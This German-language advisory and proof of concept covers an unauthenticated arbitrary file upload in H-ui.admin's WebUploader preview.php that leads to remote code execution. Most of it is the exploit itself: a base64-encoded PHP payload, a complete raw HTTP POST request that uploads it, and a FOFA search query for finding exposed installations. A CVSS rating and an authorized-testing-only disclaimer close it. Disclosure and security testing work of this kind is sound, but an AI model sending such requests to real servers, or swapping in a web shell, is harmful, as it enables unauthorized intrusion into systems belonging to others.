
Eine Schwachstelle zur Remote Code Execution (RCE), die es nicht authentifizierten Angreifern ermöglicht, beliebige PHP-Dateien direkt auf den Webserver hochzuladen. Dies führt zu einer sofortigen Remote Code Execution mit den Rechten des Webservers.
Ein Proof-of-Concept, der eine Remote Code Execution mit Webserver-Rechten über beliebiges Datei-Hochladen (Arbitrary File Upload) ausnutzt.
Eine kritische Schwachstelle für Remote Code Execution besteht in der WebUploader-Preview-Komponente des H-ui.admin-Systems. Die Datei <font style="color:rgb(15, 17, 21);background-color:rgb(235, 238, 242);">/public/static/admin/lib/webuploader/0.1.5/server/preview.php</font> weist keine ordnungsgemäße Authentifizierung und Dateivalidierung auf, wodurch nicht authentifizierte Angreifer beliebige PHP-Dateien direkt auf den Webserver hochladen können. Dies führt unmittelbar zu Remote Code Execution mit Webserver-Rechten.
printf "<? php phpinfo();?>" | base64
PD9waHAgcGhwaW5mbygpOz8+
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
FOFA:
title='Tpadmin'
Ein nicht authentifizierter Remote-Angreifer kann eine Schwachstelle für beliebiges Datei-Hochladen (Arbitrary File Upload) ausnutzen, um eine RCE mit Webserver-Rechten zu erlangen.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Medium
Es sind keine Informationen über mögliche Gegenmaßnahmen bekannt. Es wird empfohlen, das betroffene Objekt durch ein alternatives Produkt zu ersetzen.
Dieses Werkzeug ist ausschließlich für autorisierte Sicherheitstests bestimmt. Unbefugter Zugriff auf Computersysteme ist illegal.